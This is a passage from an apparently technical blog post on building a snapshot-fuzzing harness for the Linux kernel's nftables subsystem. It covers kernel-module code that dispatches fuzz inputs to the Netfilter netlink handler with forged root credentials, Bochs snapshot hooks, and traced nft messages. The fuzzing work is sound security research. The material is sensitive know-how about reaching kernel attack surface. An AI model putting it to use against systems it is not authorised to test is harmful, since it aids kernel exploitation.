<p>Then we define some globals that we need to initialize:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">handler</code>: This is a function pointer basically to the <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code> function that we look up by protocol in the <code class="language-plaintext highlighter-rouge">init</code> namespace</li>
  <li><code class="language-plaintext highlighter-rouge">kern_sock</code>: This is the <code class="language-plaintext highlighter-rouge">struct sock</code> that is registered during kernel boot for the Netfilter subsystem to receive data from userland (and I guess kernel threads?)</li>
  <li><code class="language-plaintext highlighter-rouge">skbs</code>: Just a flat buffer of the <code class="language-plaintext highlighter-rouge">skb</code> structures we’ll need to use to wrap our envelope data, the harness exchanges envelopes by <code class="language-plaintext highlighter-rouge">skb</code> structures</li>
</ul>

<p>Finally the initialization routine is thus:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// The function pointer we send the skbs to, the netlink rcv handler for</span>
<span class="c1">// netfilter nfnetlink_rcv</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">handler</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// The kernel-registered socket waiting for input from us</span>
<span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">kern_sock</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Pool of skbs we use to store data in envelopes</span>
<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skbs</span><span class="p">[</span><span class="n">LF_MAX_NUM_ENVS</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span> 

<span class="c1">// Our initialization function, called before we do any fuzzing</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_init</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Hello from lucid_fuzz_init</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">printk</span><span class="p">(</span><span class="s">"LF_MAX_INPUT_LEN is: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">);</span>

	<span class="c1">// Copy the user data over to the fuzzcase instance if there is any</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">len</span> <span class="o">&lt;=</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span>
			<span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">len</span>
		<span class="p">))</span>
		<span class="p">{</span>
			<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
			<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="n">len</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Doing this how other kernel code does it, lock the global table</span>
	<span class="n">netlink_table_grab</span><span class="p">();</span>

	<span class="c1">// Pre-set the err as if we failed to find the handler for NETFILTER</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

	<span class="c1">// Check to see if the handler is registered</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nl_table</span><span class="p">[</span><span class="n">NETLINK_NETFILTER</span><span class="p">].</span><span class="n">registered</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Grab the kernel socket</span>
	<span class="n">kern_sock</span> <span class="o">=</span> <span class="n">netlink_lookup</span><span class="p">(</span><span class="o">&amp;</span><span class="n">init_net</span><span class="p">,</span> <span class="n">NETLINK_NETFILTER</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">kern_sock</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Grab that .input handler</span>
	<span class="n">handler</span> <span class="o">=</span> <span class="n">nlk_sk</span><span class="p">(</span><span class="n">kern_sock</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">netlink_rcv</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">handler</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Ungrab the table we're done with it</span>
	<span class="n">netlink_table_ungrab</span><span class="p">();</span>

	<span class="c1">// Pre-set</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

	<span class="c1">// Create all of the socket buffers we need and store them</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">alloc_skb</span><span class="p">(</span><span class="n">LF_MAX_ENV_LEN</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
		<span class="c1">// If we failed, unroll all the previous allocations</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">while</span> <span class="p">(</span><span class="o">--</span><span class="n">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">kfree_skb</span><span class="p">(</span><span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
				<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="c1">// Initialize what we need to look legit</span>
		<span class="n">skb</span><span class="o">-&gt;</span><span class="n">pkt_type</span> <span class="o">=</span> <span class="n">PACKET_HOST</span><span class="p">;</span>
		<span class="n">skb</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">kern_sock</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">dst_group</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">creds</span><span class="p">.</span><span class="n">uid</span> <span class="o">=</span> <span class="n">GLOBAL_ROOT_UID</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">creds</span><span class="p">.</span><span class="n">gid</span> <span class="o">=</span> <span class="n">GLOBAL_ROOT_GID</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">flags</span> <span class="o">=</span> <span class="n">NETLINK_SKB_DST</span><span class="p">;</span>

		<span class="c1">// Store the skb</span>
		<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">skb</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// We are so done dude, it worked</span>
	<span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="nl">done:</span>
	<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This should initialize all of the structures we need to start actually parsing inputs and dispatching them in the main harness function.</p>

<h2 id="main-parsing-routine">Main Parsing Routine</h2>
<p>We’ve reached the point now where the input buffer global is loaded with data and we know the address of the function to invoke to dispatch the data to Netfilter. We’ve also initialized the socket buffers we’re going to use to do the transportation. We need to describe what an input looks like, so let’s define our input structures.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Define our input structures</span>
<span class="k">struct</span> <span class="n">lf_input</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">total_len</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">num_envs</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The first thing we do in the main loop is take the snapshot that Bochs will save to disk. The Lucid workflow is something like:</p>
<ol>
  <li>develop environment, harness</li>
  <li>put a special NOP operation in the harness where you want to snapshot fuzz from (<code class="language-plaintext highlighter-rouge">xchg dx, dx</code>)</li>
  <li>run the environment/harness in the <code class="language-plaintext highlighter-rouge">gui-bochs</code>. This is relatively normal Bochs binary built with GUI support that is supposed to be user-friendly and allow you to dump this Bochs snapshot to disk</li>
  <li>the Rust fuzzer binary, <code class="language-plaintext highlighter-rouge">lucid-fuzz</code> can then take that Bochs snapshot on disk, and resume its execution with a purpose-built <code class="language-plaintext highlighter-rouge">lucid-bochs</code> binary. This will call into the Lucid fuzzer before it emulates the first instruction and create a new kind of snapshot that Lucid can understand and restore every fuzzing iteration.</li>
</ol>

<p>Below is the code I’ve added to Bochs to save the Bochs snapshot to disk when we encounter the <code class="language-plaintext highlighter-rouge">xchg dx, dx</code> NOP, where <code class="language-plaintext highlighter-rouge">i</code> is a variable name for the instruction structure:</p>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if BX_SNAPSHOT
</span>  <span class="c1">// Check for take snapshot instruction `xchg dx, dx`</span>
  <span class="k">if</span> <span class="p">((</span><span class="n">i</span><span class="o">-&gt;</span><span class="n">src</span><span class="p">()</span> <span class="o">==</span> <span class="n">i</span><span class="o">-&gt;</span><span class="n">dst</span><span class="p">())</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">i</span><span class="o">-&gt;</span><span class="n">src</span><span class="p">()</span> <span class="o">==</span> <span class="mi">2</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">BX_COMMIT_INSTRUCTION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">BX_CPU_THIS_PTR</span> <span class="n">async_event</span><span class="p">)</span>
      <span class="k">return</span><span class="p">;</span>
    <span class="o">++</span><span class="n">i</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">save_dir</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"/tmp/lucid_snapshot"</span><span class="p">;</span>
    <span class="n">mkdir</span><span class="p">(</span><span class="n">save_dir</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Saving Lucid snapshot to '%s'...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">save_dir</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">SIM</span><span class="o">-&gt;</span><span class="n">save_state</span><span class="p">(</span><span class="n">save_dir</span><span class="p">))</span> <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Successfully saved snapshot</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
      <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
      <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to save snapshot</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">BX_EXECUTE_INSTRUCTION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
  <span class="p">}</span>
<span class="cp">#endif
</span></code></pre></div></div>

<p>Then we get around to making sure we have enough bytes to form the metadata structure (<code class="language-plaintext highlighter-rouge">lf_input</code>) and sanity check its values before moving on to the nested envelopes. You’ll notice that all error paths are <code class="language-plaintext highlighter-rouge">return 1;</code>, this is so that during fuzzing and mutator development, we skip over the snapshot restore NOP instruction at the end of the main fuzzing loop in the harness. This cascade of timeouts will let us know that we have a bug in our mutator. Here is the main loop:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Main input processing logic</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_handle_input</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="n">input</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="n">env</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">fuzz_skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">remaining</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Hello from lucid_fuzz_handle_input</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="cm">/** LUCID TAKES SNAPSHOT HERE **/</span>
	<span class="c1">// This special NOP instruction, when interpreted by Bochs will cause</span>
	<span class="c1">// Bochs to save a snapshot of its state to disk that Lucid will be able</span>
	<span class="c1">// to resume in its purpose built version of Bochs called `lucid_bochs`</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %dx, %dx"</span><span class="p">);</span>

	<span class="c1">// Make sure we enough bytes to construct the input metadata</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">lf_input</span><span class="p">))</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Cast the data to our metadata struct</span>
	<span class="n">input</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="p">)</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">;</span>

	<span class="c1">// Sanity check the values</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">!=</span> <span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">||</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_INPUT_SIZE</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Sanity check the number of messages</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">num_msgs</span> <span class="o">&gt;</span> <span class="n">LF_MAX_NUM_ENVS</span> <span class="o">||</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">num_msgs</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Check how many remaining bytes we have, and subtract what we already</span>
	<span class="c1">// consumed with the input metadata</span>
	<span class="n">remaining</span> <span class="o">=</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span><span class="p">;</span>
	<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Start tracking an offset into the byte buffer where we're reading from</span>
	<span class="n">offset</span> <span class="o">=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>
</code></pre></div></div>

<p>Then we can start iterating through envelopes and parsing them. Each successfully parsed envelope gets turned into an <code class="language-plaintext highlighter-rouge">skb</code> and dispatched to <code class="language-plaintext highlighter-rouge">nftables</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Iterate through the envelopes and parse each one</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// Make sure we have enough data remaining to parse an envelope metadata</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">LF_ENV_HDR_SIZE</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We can at least read the length field, and sanity check it</span>
		<span class="n">env</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="p">)(</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_MSG_SIZE</span> <span class="o">||</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Consume those bytes</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_ENV_HDR_SIZE</span><span class="p">;</span>

		<span class="c1">// Make sure we can read that much data</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We have enough data left, create the skb for this envelope</span>
		<span class="n">fuzz_skb</span> <span class="o">=</span> <span class="n">create_fuzz_skb</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">fuzz_skb</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Dispatch the fuzz_skb to nftables!</span>
		<span class="n">dispatch_skb</span><span class="p">(</span><span class="n">fuzz_skb</span><span class="p">);</span>

		<span class="c1">// Update our offset</span>
		<span class="n">offset</span> <span class="o">+=</span> <span class="p">(</span><span class="n">LF_ENV_HDR_SIZE</span> <span class="o">+</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">);</span>

		<span class="c1">// Update remaining</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>

	<span class="p">}</span>
</code></pre></div></div>

<p>We initialize the <code class="language-plaintext highlighter-rouge">fuzz_skb</code> in this function. This is where we set the socket buffer up with all the information we need to successfully get received and parsed by <code class="language-plaintext highlighter-rouge">nftables</code>. We exchange the “envelope” wrapper for the socket buffer wrapper instead:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Creates a socket buffer filled with fuzz message</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">create_fuzz_skb</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="n">env</span><span class="p">,</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Sanity check</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">idx</span> <span class="o">&gt;=</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">)</span>
		<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Grab socket buffer from global buf</span>
	<span class="n">skb</span> <span class="o">=</span> <span class="n">skbs</span><span class="p">[</span><span class="n">idx</span><span class="p">];</span>

	<span class="c1">// Set the socket buffer's sock to the kernel sock for Netfilter</span>
	<span class="n">skb</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">kern_sock</span><span class="p">;</span>

	<span class="c1">// Inject fuzz data and set sizes</span>
	<span class="n">memcpy</span><span class="p">(</span><span class="n">skb_put</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">),</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">,</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The dispatching of the <code class="language-plaintext highlighter-rouge">skb</code> is simple, we just cast the <code class="language-plaintext highlighter-rouge">handler</code> to the right function pointer signature and then invoke it with the skb:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Dispatches the skb to the appropriate netlink recv handler</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">dispatch_skb</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>
	<span class="c1">// Create function pointer, msg-&gt;protocol already sane</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">rcv</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="p">)</span> <span class="o">=</span> <span class="n">handler</span><span class="p">;</span>

	<span class="c1">// Dispatch!</span>
	<span class="n">rcv</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The main fuzzing loop then of course restores the snapshot after we’re done parsing envelopes:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Done parsing envelopes, check if we have remaining bytes</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="cm">/** LUCID RESTORES SNAPSHOT **/</span>
	<span class="n">asm_volatile</span><span class="p">(</span><span class="s">"xchgw %bx, %bx"</span><span class="p">);</span>

	<span class="c1">// Finally done</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>

<p>We’ll save the rest of the snippets for the source files I’ll post at the end.</p>

<h2 id="testing-harness">Testing Harness</h2>
<p>Everything is wired up, so now we can send inputs via the <code class="language-plaintext highlighter-rouge">harness</code> userland binary we compiled. Let’s check out <code class="language-plaintext highlighter-rouge">strace</code> on the <code class="language-plaintext highlighter-rouge">nft</code> userland utility and see where the Netlink message to create an <code class="language-plaintext highlighter-rouge">nft_table</code> is sent over the Netlink socket. Our <code class="language-plaintext highlighter-rouge">nft</code> command is: <code class="language-plaintext highlighter-rouge">nft add table inet fuzz</code>:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">// Create the Netlink socket of the protocol type NETLINK_NETFILTER
socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER) = 3

// Send the Netlink message to create a table over that socket fd we just created
sendto(3, [{nlmsg_len=20, nlmsg_type=NFNL_SUBSYS_NFTABLES&lt;&lt;8|NFT_MSG_GETGEN, nlmsg_flags=NLM_F_REQUEST, nlmsg_seq=0, nlmsg_pid=0}, {nfgen_family=AF_UNSPEC, version=NFNETLINK_V0, res_id=htons(0)}], 20, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, 12) = 20
recvmsg(3, {msg_name={sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, msg_namelen=12, msg_iov=[{iov_base=[{nlmsg_len=44, nlmsg_type=NFNL_SUBSYS_NFTABLES&lt;&lt;8|NFT_MSG_NEWGEN, nlmsg_flags=0, nlmsg_seq=0, nlmsg_pid=125392}, {nfgen_family=AF_UNSPEC, version=NFNETLINK_V0, res_id=htons(103)}, [[{nla_len=8, nla_type=0x1}, "\x00\x00\x00\x67"], [{nla_len=8, nla_type=0x2}, "\x00\x01\xe9\xd0"], [{nla_len=8, nla_type=0x3}, "\x6e\x66\x74\x00"]]], iov_len=69631}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 44
</span></code></pre></div></div>

<p>So it happens during <code class="language-plaintext highlighter-rouge">sendmsg</code> syscall, so what I did was just write an <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared object to hexdump the iovec data sent over <code class="language-plaintext highlighter-rouge">sendmsg</code>. So now I can get a <code class="language-plaintext highlighter-rouge">hexdump -C</code> style output for the <code class="language-plaintext highlighter-rouge">nft</code> message:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">LD_PRELOAD=$</span>PWD/hexdump_netlink.so nft add table inet fuzz
<span class="go">00000000  14 00 00 00 10 00 01 00  00 00 00 00 00 00 00 00 |................|
00000010  00 00 0a 00 28 00 00 00  00 0a 01 00 01 00 00 00 |....(...........|
00000020  00 00 00 00 01 00 00 00  09 00 01 00 66 75 7a 7a |............fuzz|
00000030  00 00 00 00 08 00 02 00  00 00 00 00 14 00 00 00 |................|
00000040  11 00 01 00 02 00 00 00  00 00 00 00 00 00 0a 00 |................|
</span></code></pre></div></div>

<p>Now we know what a legit <code class="language-plaintext highlighter-rouge">nftables</code> message looks like and we can wrap it in our <code class="language-plaintext highlighter-rouge">lf_input</code> and <code class="language-plaintext highlighter-rouge">lf_envelope</code> structures and test the harness! I took that output and just hardcoded it into a janky Python script to dump the binary to the terminal:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="c1"># Dumped message
</span><span class="n">msg_str</span> <span class="o">=</span> <span class="p">[</span>
    <span class="s">"00000000  14 00 00 00 10 00 01 00  00 00 00 00 00 00 00 00 |................|"</span><span class="p">,</span>
    <span class="s">"00000010  00 00 0a 00 28 00 00 00  00 0a 01 00 01 00 00 00 |....(...........|"</span><span class="p">,</span>
    <span class="s">"00000020  00 00 00 00 01 00 00 00  09 00 01 00 66 75 7a 7a |............fuzz|"</span><span class="p">,</span>
    <span class="s">"00000030  00 00 00 00 08 00 02 00  00 00 00 00 14 00 00 00 |................|"</span><span class="p">,</span>
    <span class="s">"00000040  11 00 01 00 02 00 00 00  00 00 00 00 00 00 0a 00 |................|"</span>
<span class="p">]</span>

<span class="c1"># Byte string we'll fill
</span><span class="n">all_bytes</span> <span class="o">=</span> <span class="sa">b</span><span class="s">''</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">msg_str</span><span class="p">:</span>
    <span class="c1"># Skip the offset stuff
</span>    <span class="n">hex_start</span> <span class="o">=</span> <span class="n">line</span><span class="p">[</span><span class="mi">10</span><span class="p">:]</span>

    <span class="c1"># Cut off the back ascii stuff
</span>    <span class="n">hex_str</span> <span class="o">=</span> <span class="n">hex_start</span><span class="p">[:</span><span class="nb">len</span><span class="p">(</span><span class="n">hex_start</span><span class="p">)</span> <span class="o">-</span> <span class="mi">18</span><span class="p">]</span>

    <span class="c1"># Remove the spaces
</span>    <span class="n">hex_str</span> <span class="o">=</span> <span class="n">hex_str</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">" "</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>

    <span class="c1"># Start appending
</span>    <span class="n">all_bytes</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">hex_str</span><span class="p">)</span>

<span class="c1"># Now with bytes, wrap that in envelope
</span><span class="n">envelope_len</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">all_bytes</span><span class="p">)</span>
